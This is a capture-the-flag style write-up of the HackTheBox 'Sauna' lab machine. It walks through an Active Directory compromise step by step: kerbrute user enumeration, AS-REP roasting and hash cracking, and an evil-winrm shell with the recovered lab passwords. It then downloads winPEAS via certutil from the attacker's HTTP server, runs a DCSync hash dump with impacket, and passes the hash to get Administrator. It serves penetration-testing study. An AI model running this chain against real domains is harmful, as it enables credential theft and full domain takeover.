HackTheBox - Sauna Writeup

tags: writeup HackTheBox Sauna Easy OSCP Pass-The-Hash Evil-WinRM Kerbrute Impacket

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Port Scanning

# Nmap 7.92 scan initiated Thu Aug 25 18:16:41 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.066s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-26 17:13:08Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 18h56m13s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-08-26T17:13:17
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 25 18:17:41 2022 -- 1 IP address (1 host up) scanned in 59.48 seconds

• Port 53 : DNS Server
• Port 80 : HTTP Server
• Port 88 : Kerberos - Sec
• Port 135 : MSRPC
• Port 139 : Netbios-ssn
• Port 389 : LDAP
• Port 445 : Microsoft-ds
• Port 464 : kpasswd5
• Port 593 : ncacn_http
• Port 636 : Tcpwrapped

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Enumeration

Knowing we have kerberos we are going to enumerate users using kerbrute:

/opt/kerbrute/kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Explotation

After enumerating users it's time to try ASREP-Roasting for obtaining
krbasrep5 hashes, in this case we can ASREP-Roast fsmith account with the following command.

impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith -no-pass

We obtain the hash and we have to crack it, i use john.

john kerberos --wordlist=/usr/share/wordlists/rockyou.txt

We obtain the following password:

Shell with evil-winrm

After knowing the user & the password we can obtain shell with evil-winrm with the following command:

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

Now it's time to start the privilege escalation.

⏫Root Privesc

First we are gonna upload a copy of winpeas to enumerate the system. We have to start the HTTP server:

python3 -m http.server 80

I'd like to use certutil to download into the target machine:

certutil -urlcache -f http://10.10.10.10/winPEASx64.exe winpeas.exe

c:\Windows\System32\cmd.exe /c winpeas.exe

After reading the winpeas report it found some autologon credentials:

With these credentials we can receive a shell as svc_loanmanager
with evil-winrm again, but now we are gonna use python-bloodhound ingestor to enumerate the AD and find the way to obtain Administrator Credentials, use the following command to obtain the json files that we import in bloodhound app.

Here you have a link that show how to use bloodhound.

bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c All

Importing the json files to bloodhound and doing a query to find Principals With DCSync Rights We see that svc_loanmgr has them, so we can use impacket-secretdump to perform the DCsync attack and dump the NTLM hashes that we can use to Pass-The-Hash.

impacket-secretdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175

After that we have to enter the password and we receive a los of hashes, and how we obtain NTLMv1 hashes we can use the second part of the hash , the NT to pass the hash and obtain shell as Administrator.

The hash is composed by the Username of the account, the Account ID, the LM hash and the NT hash, everything separated by a colon.

Using Evil-winrm we can Pass-The-Hash and obtain the shell with the following command:

evil-winrm -i 10.10.10.175 -u Administrator -H NTHash

And after that we are Domain Admins and we have Administrator rights so we can do everything we want!

You can find me on: